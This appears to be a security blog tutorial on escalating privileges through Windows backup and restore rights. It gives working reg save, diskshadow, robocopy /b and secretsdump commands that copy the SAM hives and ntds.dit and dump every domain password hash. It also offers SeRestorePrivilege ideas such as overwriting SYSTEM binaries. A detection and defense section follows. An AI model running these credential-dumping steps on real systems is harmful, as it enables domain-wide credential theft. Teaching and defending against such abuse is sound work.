Abusing SeBackupPrivilege and SeRestorePrivilege for Windows Privilege Escalation

Windows Privesc
2026.03.27
Time it takes to read this article 5 minutes.

Disclaimer: This article is for educational purposes and authorized security testing only. Only run these techniques against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is illegal in virtually every jurisdiction.

Introduction / Overview

Windows privileges are not all created equal. A handful of them are effectively "game over" the moment your token holds them, even when you are not a member of the Administrators group. Two of the most powerful are SeBackupPrivilege ("Back up files and directories") and SeRestorePrivilege ("Restore files and directories").

These privileges are granted to the built-in Backup Operators group, and they are also frequently delegated to service accounts, backup software accounts, and helpdesk roles. In this article you'll learn:

  • Why SeBackupPrivilege lets you bypass NTFS DACLs and read files you have no permission to open.
  • How to extract the local SAM and SYSTEM hives for offline credential extraction.
  • How to copy ntds.dit off a Domain Controller to dump every domain hash.
  • How blue teams detect and contain this abuse.

This is a textbook privilege-escalation-to-credential-access pivot and maps to MITRE ATT&CK T1003 OS Credential Dumping.

How it works / Background

NTFS access checks normally compare your token against each file's DACL. SeBackupPrivilege short-circuits that: when a process opens a handle with the FILE_FLAG_BACKUP_SEMANTICS flag and requests backup intent, the kernel grants access if the privilege is present, ignoring the DACL. The Win32 API path is CreateFile() with FILE_FLAG_BACKUP_SEMANTICS; the equivalent rights are READ_CONTROL | ACCESS_SYSTEM_SECURITY.

SeRestorePrivilege is the mirror image: it lets you write files (and set ownership/ACLs) while bypassing the DACL, intended so backup software can restore data into protected locations.

The catch for an attacker is that locked files (like the live registry hives or ntds.dit) are held open by the kernel/lsass, so you cannot simply copy them. There are three reliable ways around this:

  1. reg save — the Registry API exposes a backup function (RegSaveKey) that respects SeBackupPrivilege and produces a consistent hive snapshot without needing the raw file handle.
  2. Volume Shadow Copy (diskshadow) — create a point-in-time snapshot of the volume, then copy the now-unlocked file out of the shadow.
  3. robocopy /b — Robocopy's backup mode opens files using backup semantics, which honors SeBackupPrivilege.

Prerequisites / Lab setup

  • A Windows host (workstation or Domain Controller) where your compromised account is a member of Backup Operators, or otherwise holds the privileges.
  • A foothold shell (WinRM/evil-winrm, RDP, or a reverse shell).
  • An offline cracking/parsing host with impacket (secretsdump.py) installed.

First, confirm the privileges are actually present and enabled in your token:

whoami /priv

Look for SeBackupPrivilege and SeRestorePrivilege with state Enabled. If they show as Disabled, they are still in the token and most tools (or a helper like SeBackupPrivilegeUtils) can enable them on demand — the presence in the list is what matters.

Attack walkthrough / PoC

Case 1: Local SAM/SYSTEM on a member host

The local account hashes live in the SAM hive, encrypted with the boot key stored in SYSTEM. With SeBackupPrivilege you can save both:

reg save HKLM\SAM C:\Temp\SAM.hive
reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive
reg save HKLM\SECURITY C:\Temp\SECURITY.hive

Exfiltrate them (SMB, evil-winrm's download, etc.) and parse offline with impacket:

secretsdump.py -sam SAM.hive -system SYSTEM.hive -security SECURITY.hive LOCAL

SECURITY is optional but worth grabbing — it yields cached domain logons (DCC2) and LSA secrets, which often include service-account plaintext passwords.

Case 2: Copying ntds.dit off a Domain Controller

On a DC, the crown jewels are in ntds.dit (the AD database) plus the SYSTEM hive for the boot key. ntds.dit is locked by lsass, so reg save won't help here — we need a shadow copy or robocopy backup mode.

Option A — diskshadow. Create a script and feed it to diskshadow:

# shadow.txt
set context persistent nowriters
set metadata C:\Temp\meta.cab
add volume C: alias adshadow
create
expose %adshadow% Z:

diskshadow /s C:\Temp\shadow.txt

The volume is now mounted at Z:. Copy the database and registry out of the snapshot using robocopy /b (backup mode), which lets the copy honor SeBackupPrivilege:

robocopy /b Z:\Windows\NTDS C:\Temp ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM.hive

Option B — robocopy backup mode against the live volume. If you'd rather skip the shadow plumbing, robocopy /b alone can read open/locked files in many configurations because it uses FILE_FLAG_BACKUP_SEMANTICS:

robocopy /b C:\Windows\NTDS C:\Temp ntds.dit

Then dump every domain hash offline:

secretsdump.py -ntds ntds.dit -system SYSTEM.hive LOCAL

This yields the NTLM hash of every domain account, including krbtgt — which is exactly what you need to forge a Golden Ticket. See Golden Ticket attacks and DCSync explained for what to do with those hashes next.

Case 3: SeRestorePrivilege-only paths

If you hold SeRestorePrivilege but not SeBackupPrivilege, the abuse shifts to writing protected files. Classic primitives include overwriting a binary that runs as SYSTEM, dropping a malicious DLL into a hijackable load path, or modifying utilman.exe/sethc.exe semantics. You can also write a service binary path or replace a privileged scheduled-task target. The key point: write-anywhere plus an auto-elevating trigger equals SYSTEM. For DLL hijack mechanics, see DLL hijacking.

Mermaid diagram

Abusing SeBackupPrivilege and SeRestorePrivilege for Windows Privilege Escalation diagram 1

Flow: a Backup Operator confirms the privilege, dumps either local hives or ntds.dit, parses them offline with secretsdump, and pivots to domain compromise.

Detection & Defense (Blue Team)

Treat membership in privileged backup roles as Tier-0 and monitor it like Domain Admin.

Reduce exposure

  • Audit the Backup Operators group and the "Back up files and directories" / "Restore files and directories" user-rights assignments (SeBackupPrivilege / SeRestorePrivilege) via secedit /export or GPO Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment. Remove standing membership; grant it just-in-time.
  • Run backup software under a dedicated, tightly scoped account, and never let interactive/helpdesk users inherit these rights.
  • On Domain Controllers, restrict who can log on at all (Allow log on locally / through Remote Desktop) so these privileges can't be exercised by lateral movers.

Detect

  • 4672 — Special privileges assigned to new logon: alert when SeBackupPrivilege/SeRestorePrivilege appear for non-backup accounts or outside backup windows.
  • 8222 / VSS events and System log Event ID 524 (NTBackup) style activity; monitor for diskshadow.exe and vssadmin execution, especially create shadow / expose.
  • Process and command-line auditing (Sysmon Event ID 1) for reg.exe save, robocopy ... /b, and diskshadow /s. The combination of reg save HKLM\SAM or any access to ntds.dit outside the backup product is high-fidelity.
  • Object access auditing (4663) on C:\Windows\NTDS\ntds.dit and on the SAM/SYSTEM hive files — backup software has a known, allowlistable pattern; anything else is suspicious.
  • EDR file-handle telemetry: opens of ntds.dit or registry hives with FILE_FLAG_BACKUP_SEMANTICS from non-backup binaries.

Contain

  • Rotate any credentials that may have been dumped. If ntds.dit was touched, treat the domain as compromised: rotate krbtgt twice, then reset privileged accounts.
  • Enable Credential Guard and LSA protection to raise the cost of complementary credential theft, and keep offline hive copies (and shadow exposures) from lingering on disk.

Conclusion

SeBackupPrivilege and SeRestorePrivilege are a reminder that "not an admin" is not the same as "not dangerous." A single Backup Operator membership lets an attacker bypass NTFS DACLs, snapshot the registry and ntds.dit, and walk away with every hash in the domain. Defenders should treat these user rights as Tier-0, grant them just-in-time, and alert on the very specific tooling (reg save, diskshadow, robocopy /b) that abuse requires.

References

Comments

Copied title and URL